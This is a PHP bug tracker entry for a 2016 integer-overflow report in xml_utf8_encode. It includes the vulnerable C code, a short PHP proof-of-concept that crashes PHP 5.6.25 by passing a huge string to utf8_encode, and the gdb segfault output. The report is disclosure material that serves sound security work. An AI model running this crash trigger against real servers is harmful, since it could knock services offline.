|
|
php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login |
PatchesPull RequestsHistoryAllCommentsChangesGit/SVN commits
[2016-08-23 10:43 UTC] ahihibughunter at gmail dot com
-Type: Bug
+Type: Security
-Private report: No
+Private report: Yes
[2016-08-23 10:43 UTC] ahihibughunter at gmail dot com
[2016-09-02 06:32 UTC] stas@php.net
-Assigned To:
+Assigned To: stas
[2016-09-02 06:32 UTC] stas@php.net
[2016-09-02 15:21 UTC] ahihibughunter at gmail dot com
[2016-09-13 04:12 UTC] stas@php.net
-Status: Assigned
+Status: Closed
[2016-09-13 04:12 UTC] stas@php.net
[2017-02-13 01:27 UTC] stas@php.net
-Type: Security
+Type: Bug
|
|||||||||||||||||||||||||||
Copyright © 2001-2025 The PHP GroupAll rights reserved. |
Last updated: Wed Nov 05 23:00:01 2025 UTC |
Description: ------------ in xml_utf8_encode function, the safe_emalloc did not check value it alloc for string, which used to store the result of encoded buffer. This cause the length of string after encode > INT_MAX. PHPAPI char *xml_utf8_encode(const char *s, int len, int *newlen, const XML_Char *encoding) { ..... newbuf = safe_emalloc(len, 4, 1); //<- muse check size of safe_emalloc here, .... } else if (c < 0x800) { newbuf[(*newlen)++] = (0xc0 | (c >> 6)); newbuf[(*newlen)++] = (0x80 | (c & 0x3f)); ... } Test script: --------------- <?php ini_set('memory_limit', -1); $a = str_repeat('Ã', (0xffffffff/6) - 10); $b = utf8_encode($a); ?> Expected result: ---------------- No crash Actual result: -------------- $gdb /data/php-src-PHP-5.6.25/sapi/cli/php GNU gdb (Ubuntu 7.7.1-0ubuntu5~14.04.2) 7.7.1 Copyright (C) 2014 Free Software Foundation, Inc. Program received signal SIGSEGV, Segmentation fault. 0x000000000095b841 in xml_utf8_encode ( s=0x7fffd95e9070 'Ã' <repeats 100 times>..., len=1431655744, newlen=0x7fffffffabb0, encoding=0x10a27f1 "ISO-8859-1") at /data/php-src-PHP-5.6.25/ext/xml/xml.c:642 642 newbuf[(*newlen)++] = (0xc0 | (c >> 6)); (gdb)